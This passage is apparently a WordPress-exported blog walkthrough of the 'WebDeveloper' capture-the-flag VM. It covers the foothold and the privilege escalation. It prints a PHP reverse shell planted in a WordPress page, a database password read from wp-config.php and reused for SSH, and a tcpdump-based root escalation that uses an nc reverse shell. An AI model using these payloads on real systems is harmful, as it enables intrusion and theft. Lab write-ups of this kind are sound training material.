src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317002146749\" 
\/><\/div><\/p>\n<p>We are in!!! Ah~~<\/p>\n<p>Add a reverse shell to its 404 page!<\/p>\n<pre><code class=\"language-php\">&lt;?php exec (&quot;bash -c &#039;exec bash -i &amp;&gt;\/dev\/tcp\/10.161.181.188\/1234 &lt;&amp;1&#039;&quot;);?&gt;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103367.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103367.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317003204745\" \/><\/div><\/p>\n<p>Visit:<\/p>\n<pre><code class=\"language-bash\">wp-content\/plugins\/akismet\/akismet.php<\/code><\/pre>\n<p>Trigger the reverse shell!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103368.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103368.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317003321280\" 
style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Got a shell!!!!<\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Switching to the webdeveloper User<\/h3>\n<p>I originally wanted to upload a public key and log in over SSH, but could not create <code>.ssh<\/code>, so let's look at the relevant information:<\/p>\n<pre><code class=\"language-bash\">www-data@webdeveloper:\/home\/webdeveloper$ whoami;id\nwhoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\nwww-data@webdeveloper:\/home\/webdeveloper$ sudo -l\nsudo -l\nsudo: no tty present and no askpass program specified\nwww-data@webdeveloper:\/home\/webdeveloper$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n&lt;webdeveloper$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/bin\/su\n\/bin\/mount\n\/bin\/fusermount\n\/bin\/ntfs-3g\n\/bin\/umount\n\/bin\/ping\n\/snap\/core\/16928\/bin\/mount\n\/snap\/core\/16928\/bin\/ping\n\/snap\/core\/16928\/bin\/ping6\n\/snap\/core\/16928\/bin\/su\n\/snap\/core\/16928\/bin\/umount\n\/snap\/core\/16928\/usr\/bin\/chfn\n\/snap\/core\/16928\/usr\/bin\/chsh\n\/snap\/core\/16928\/usr\/bin\/gpasswd\n\/snap\/core\/16928\/usr\/bin\/newgrp\n\/snap\/core\/16928\/usr\/bin\/passwd\n\/snap\/core\/16928\/usr\/bin\/sudo\n\/snap\/core\/16928\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core\/16928\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core\/16928\/usr\/lib\/snapd\/snap-confine\n\/snap\/core\/16928\/usr\/sbin\/pppd\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/x86_64-linux-gnu\/lxc\/lxc-user-nic\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/bin\/sudo\n\/usr\/bin\/pkexec\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/bin\/newgidmap\n\/usr\/bin\/newuidmap\n\/usr\/bin\/newgrp\n\/usr\/bin\/at\n\/usr\/bin\/traceroute6.iputils\nwww-data@webdeve
loper:\/home\/webdeveloper$ cat \/etc\/cron*\ncat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# m h dom mon dow user  command\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\nwww-data@webdeveloper:\/home\/webdeveloper$ cat \/etc\/passwd\ncat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List 
Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:\/run\/systemd\/netif:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:\/run\/systemd\/resolve:\/usr\/sbin\/nologin\nsyslog:x:102:106::\/home\/syslog:\/usr\/sbin\/nologin\nmessagebus:x:103:107::\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:104:65534::\/nonexistent:\/usr\/sbin\/nologin\nlxd:x:105:65534::\/var\/lib\/lxd\/:\/bin\/false\nuuidd:x:106:110::\/run\/uuidd:\/usr\/sbin\/nologin\ndnsmasq:x:107:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\nlandscape:x:108:112::\/var\/lib\/landscape:\/usr\/sbin\/nologin\npollinate:x:109:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:110:65534::\/run\/sshd:\/usr\/sbin\/nologin\nwebdeveloper:x:1000:1000:WebDeveloper:\/home\/webdeveloper:\/bin\/bash\nmysql:x:111:114:MySQL Server,,,:\/nonexistent:\/bin\/false<\/code><\/pre>\n<p>Now take a look at the database file:<\/p>\n<pre><code class=\"language-bash\">cd \/var\/www\/html\nls -la\ncat wp-config.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103369.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103369.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" 
alt=\"image-20240317004031783\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>See whether we can log in over ssh.<\/p>\n<pre><code class=\"language-php\">\/** MySQL database username *\/\ndefine(&#039;DB_USER&#039;, &#039;webdeveloper&#039;);\n\n\/** MySQL database password *\/\ndefine(&#039;DB_PASSWORD&#039;, &#039;MasterOfTheUniverse&#039;);<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103370.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103370.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317004301553\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Login succeeded!<\/p>\n<h3>Privilege escalation to root<\/h3>\n<p>Take a look at the relevant information first: information gathering!!!<\/p>\n<p>Right away we find something good:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103371.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103371.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317004500368\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>We can try to make use of this <code>tcpdump<\/code>, so check whether there is a known way to abuse it:<\/p>\n<pre><code class=\"language-url\">https:\/\/gtfobins.github.io\/gtfobins\/tcpdump\/<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103372.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103372.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317004646376\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>Check <code>suid<\/code>:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103373.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103373.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317004739910\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Attempt the privilege escalation:<\/p>\n<pre><code class=\"language-bash\">cd \/tmp\necho &quot;rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 10.161.181.188 1234 &gt;\/tmp\/f&quot; &gt; exp\nchmod +x exp\nsudo tcpdump -ln -i eth0 -w \/dev\/null -W 1 -G 1 -z \/tmp\/exp -Z root<\/code><\/pre>\n<p>After entering the commands, exit the <code>ssh<\/code> login, and you get <code>root<\/code>.<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103374.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103374.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317010201589\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103375.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103375.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317010236203\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>We got the flag we have been dreaming of!<\/p>\n<pre><code class=\"language-flag\">cba045a5a4f26f1cd8d7be9a5c2b1b34f6c5d290<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>WebDeveloper For some reason this target VM was painfully slow to download.... It got much better after switching to another node! Start! Information gathering \u7aef [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-405","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/405","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=405"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/405\/revisions"}],"predecessor-version":[{"id":406,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/405\/revisions\/406"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\
/wp\/v2\/media?parent=405"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=405"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=405"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}